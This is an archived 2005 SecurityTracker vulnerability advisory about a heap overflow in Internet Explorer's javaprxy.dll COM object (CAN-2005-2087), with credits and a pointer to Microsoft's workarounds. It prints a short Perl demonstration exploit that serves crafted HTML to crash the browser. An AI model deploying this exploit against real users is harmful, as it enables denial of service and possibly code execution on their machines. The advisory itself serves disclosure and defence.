SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE) Vendors:  Microsoft
(Vendor Describes Workarounds) Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Crash the Browser
SecurityTracker Alert ID:  1014363
SecurityTracker URL:  http://securitytracker.com/id?1014363
CVE Reference:  CAN-2005-2087   (Links to External Site)
Date:  Jul 2 2005
Impact:  Denial of service via network
Vendor Confirmed:  Yes  
Advisory:  Microsoft Security Advisory
Version(s): 6 SP1 and prior versions
Description:  A vulnerability was reported in Microsoft Internet Explorer in 'javaprxy.dll'. A remote user can cause the target user's browser to crash or potentially execute arbitrary code.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a heap overflow in 'javaprxy.dll' and cause the target user's browser to crash. Specially crafted object tags can cause certain COM componenets to crash.

It may be possible to overwrite a function pointer to execute arbitrary code. However, the vendor could not reproduce a function pointer overwrite.

A demonstration exploit is provided:

#!/usr/bin/perl

# in order for this to work javaprxy.dll must be available on the client.

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

my $html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";

print "Content-Type: text/html;\r\n\r\n";

print $html1.("A"x30000).$html2;

The vendor was notified on June 17, 2005.

sk0L and Martin Eiszner from SEC-CONSULT discovered this vulnerability.
Impact:  A remote user can cause the target user's browser to crash.

A remote user may be able to execute arbitrary code on the target system [however, code execution was not confirmed in the report].
Solution:  No solution was available at the time of this entry.

Microsoft has described some workarounds in their advisory, available at:

http://www.microsoft.com/technet/security/advisory/903144.mspx
Vendor URL:  www.microsoft.com/technet/security/advisory/903144.mspx (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 29 2005 Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Crash the Browser


 Source Message Contents
Date:  Sat, 2 Jul 2005 11:25:37 -0400
Subject:  http://www.microsoft.com/technet/security/advisory/903144.mspx

 
 
 
> Microsoft Security Advisory (903144)
> A COM Object (Javaprxy.dll) Could Cause Internet Explorer to Unexpectedly Exit


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC